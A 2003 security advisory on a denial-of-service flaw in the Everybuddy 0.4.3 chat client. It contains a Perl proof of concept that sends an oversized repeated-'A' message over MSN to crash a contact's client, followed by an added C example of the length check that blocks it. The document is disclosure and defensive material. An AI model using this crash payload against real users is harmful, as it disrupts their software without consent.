Everybuddy Vulnerable to a DoS Attack (Long Message)
Summary
Everybuddy is a chat client that supports the AIM, ICQ, MSN, Yahoo! and Jabber protocols. The program contains a security vulnerability that allows remote attackers to crash it by sending an overly long instant message.
Credit:
The information has been provided by Noam Rathaus and SecurITeam Experts.
Details
Vulnerable systems:
* Everybuddy version 0.4.3
Exploit:
The exploit code logs in as an MSN user, waits for someone to open a conversation with it, and then sends that contact the attack string.
#!/usr/bin/perl
use MSN; # from http://www.adamswann.com/library/2002/msn-perl/

my %queue; # per-user FIFO of messages waiting for a switchboard session

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status  => \&Status,
    Answer  => \&Answer,
    Message => \&Message,
    Join    => \&Join }
);

sub Status {
    my ($self, $username, $newstatus) = @_;
    print "Status() called with parameters:\n";
    print ' ' . join(',', @_), "\n";
    # Print the status change info.
    print "${username}'s status changed from " . $self->buddystatus($username) . " to $newstatus.\n";
    # Initiate the call.
    $self->call($username);
    # The call may take a few seconds to complete, so we can't
    # immediately send messages. Let's put the message in a
    # FIFO (queue) that is keyed by username.
    push (@{$queue{$username}}, 'Glad to see you online!');
}

sub Message {
    my ($self, $username, undef, $msg) = @_;
    print "Message() called with parameters:\n";
    print ' ' . join(',', @_), "\n";
}

sub Join {
    my ($self, $username) = @_;
    print "Join() called with parameters:\n";
    print ' ' . join(',', @_), "\n";
    # See if there's anything queued up.
    # Deliver each message if there is stuff in the queue for this user.
    while ($_ = shift @{$queue{$username}}) {
        $$self->sendmsg($_);
    }
}

sub Answer {
    my ($self, $username) = @_;
    print "Answer() called with parameters:\n";
    print ' ' . join(',', @_), "\n";
    # Send the attack string: 27 'A' bytes plus a carriage return, repeated 55 times (1540 bytes).
    $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r" x 55);
}
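The advisory gives no root cause beyond "overly long message", so the following added example (not Everybuddy's code, and not part of the SecurITeam advisory) shows the receive-side check that prevents this class of crash: the client bounds an incoming message against its buffer and rejects the 1540-byte string the PoC above sends instead of copying it. The 1024-byte buffer size and the function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the client's receive buffer. Not a value taken from
 * Everybuddy; the advisory does not say where the crash happens. */
#define IM_MAX_LEN 1024

static char g_raw[2048];         /* holds the constructed test message */
static char g_inbox[IM_MAX_LEN]; /* stands in for the client's buffer */

/* Copy an incoming message only if it fits, NUL terminator included.
 * Returns 0 when accepted, -1 when rejected (too long or bad args). */
int im_receive(const char *msg, size_t len, char *dst, size_t dst_size)
{
    if (msg == NULL || dst == NULL || dst_size == 0)
        return -1;
    if (len + 1 > dst_size) /* exactly dst_size bytes would still overrun */
        return -1;
    memcpy(dst, msg, len);
    dst[len] = '\0';
    return 0;
}

/* Build the advisory's test string: 27 'A' bytes plus a carriage
 * return, repeated 55 times (1540 bytes). Constructed in memory for
 * the demonstration; returns the length written. */
size_t build_long_message(char *buf, size_t buf_size)
{
    char unit[28];
    size_t total = 0;
    if (buf == NULL || buf_size == 0)
        return 0;
    memset(unit, 'A', 27);
    unit[27] = '\r';
    for (int i = 0; i < 55; i++) {
        if (total + sizeof unit + 1 > buf_size)
            break; /* never outgrow our own buffer either */
        memcpy(buf + total, unit, sizeof unit);
        total += sizeof unit;
    }
    buf[total] = '\0';
    return total;
}

int main(void)
{
    size_t n = build_long_message(g_raw, sizeof g_raw);
    printf("%zu-byte message: %s\n", n,
           im_receive(g_raw, n, g_inbox, sizeof g_inbox) == 0 ? "accepted" : "rejected");
    printf("2-byte message: %s\n",
           im_receive("hi", 2, g_inbox, sizeof g_inbox) == 0 ? "accepted" : "rejected");
    return 0;
}
```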
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then went silent again), we are forced to release this information without having received a proper response from them.
Disclosure timeline:
19/06/2003 – First attempt to contact vendor
20/06/2003 – First vendor response
22/06/2003 – PoC provided to vendor
01/07/2003 – Second attempt to contact vendor
01/08/2003 – Third attempt to contact vendor
05/08/2003 – Public advisory